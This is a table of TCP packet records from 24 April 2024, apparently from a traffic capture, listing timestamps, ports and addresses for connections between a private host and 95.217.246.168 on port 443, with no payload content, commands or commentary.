Apr 24, 2024 16:49:07.251351118 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.306153059 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.306231022 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.306323051 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.306335926 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.306397915 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.377178907 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.377253056 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.377322912 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.377348900 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.377383947 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.377408028 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.440821886 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.440869093 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.440923929 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.440941095 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.440988064 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.502641916 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.502686977 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.502778053 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.502795935 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.502810955 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.502842903 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.549289942 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.549343109 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.549401045 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.549411058 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.549474001 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.589634895 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.589688063 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.589889050 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.589899063 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.589943886 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.628485918 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.628514051 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.628567934 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.628575087 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.628613949 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.628645897 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.658977032 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.659007072 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.659070015 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.659080982 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.659125090 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.687978029 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.688004017 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.688052893 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.688061953 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.688095093 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.688122988 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.719422102 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.719456911 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.719510078 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.719521046 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.719547033 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.719571114 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.744781017 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.744806051 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.744899035 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.744908094 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.744956017 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.772721052 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.772742033 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.772845030 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.772852898 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.772900105 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.796072006 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.796092987 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.796204090 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.796211004 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.796262026 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.822645903 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.822673082 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.822735071 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.822741985 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.822782993 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.844747066 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.844820023 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.845021963 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.845088005 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.865103960 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.865122080 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.865199089 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.865221024 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.865271091 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.898581028 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.898601055 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.898677111 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.898698092 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.898740053 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.912116051 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.912132978 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.912204027 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.912220001 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.912250042 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.912267923 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.930839062 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.930856943 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.930917025 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.930932045 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.930973053 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.930994987 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.951445103 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.951464891 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.951534986 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.951551914 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.951584101 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.951601982 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.970134974 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.970155954 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.970269918 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.970280886 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.970330000 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.986684084 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.986702919 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.986783981 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:07.986794949 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:07.986845970 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.012397051 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.012418985 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.012567043 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.012588978 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.012604952 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.012629032 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.031883955 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.031902075 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.032013893 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.032046080 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.032107115 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.052403927 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.052434921 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.052573919 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.052583933 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.052634001 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.067066908 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.067085028 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.067176104 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.067186117 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.067234993 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.081904888 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.081922054 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.082021952 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.082031965 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.082076073 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.093882084 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.093909979 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.093987942 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.093997002 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.094046116 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.107003927 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.107018948 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.107101917 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.107111931 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.107158899 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.118786097 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.118805885 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.118881941 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.118891954 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.118938923 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.132158041 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.132174015 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.132282972 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.132292032 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.132339001 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.133981943 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.134047985 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.134052038 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.134099007 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.134313107 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.134313107 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.134326935 CEST	443	49755	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.134381056 CEST	49755	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.170509100 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.170533895 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.170624971 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.170984030 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.171000004 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.827873945 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.827996016 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.828586102 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.828587055 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:08.828598022 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:08.828614950 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:09.875844955 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:09.875863075 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:09.875878096 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:09.875922918 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:09.875983953 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:09.875994921 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:09.876059055 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.025271893 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.025300980 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.025363922 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.025381088 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.025439978 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.025439978 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.252008915 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.252029896 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.252217054 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.252234936 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.252284050 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.396924019 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.396943092 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.397030115 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.397064924 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.397145033 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.511761904 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.511780024 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.511893988 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.511913061 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.511977911 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.590053082 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.590070963 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.590137959 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.590153933 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.590192080 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.652813911 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.652837992 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.652904987 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.652926922 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.652987957 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.715512037 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.715531111 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.715718985 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.715739965 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.715806007 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.781254053 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.781275988 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.781399012 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.781419039 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.781477928 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.845993042 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.846014023 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.846096992 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.846112967 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.846230030 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.903040886 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.903057098 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.903343916 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.903358936 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.903465033 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.931931019 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.931946993 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.932116985 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.932127953 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.932195902 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.967955112 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.967974901 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.968105078 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.968120098 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.968251944 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.998471022 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.998491049 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.998572111 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:10.998585939 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:10.998846054 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.029829025 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.029844046 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.030173063 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.030188084 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.030288935 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.061022997 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.061039925 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.061295986 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.061309099 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.061403990 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.089498997 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.089514971 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.089867115 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.089875937 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.089939117 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.113274097 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.113292933 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.113360882 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.113379002 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.113445997 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.140512943 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.140531063 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.140609980 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.140629053 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.140686035 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.164984941 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.165009022 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.165097952 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.165110111 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.165179968 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.186398029 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.186419964 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.186594963 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.186618090 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.186753035 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.207468987 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.207485914 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.207580090 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.207595110 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.207655907 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.242292881 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.242309093 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.242388010 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.242408037 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.242450953 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.263367891 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.263384104 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.263477087 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.263493061 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.263539076 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.281784058 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.281799078 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.281877995 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.281891108 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.282002926 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.302898884 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.302916050 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.302999020 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.303015947 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.303113937 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.319252968 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.319268942 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.319367886 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.319367886 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.319386005 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.319482088 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.327425957 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.327506065 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.327512026 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.327578068 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.327728987 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.327728987 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.327749014 CEST	443	49756	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.327800035 CEST	49756	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.366126060 CEST	49758	443	192.168.2.4	95.217.246.168
Apr 24, 2024 16:49:11.366153002 CEST	443	49758	95.217.246.168	192.168.2.4
Apr 24, 2024 16:49:11.366230965 CEST	49758	443	192.168.2.4	95.217.246.168
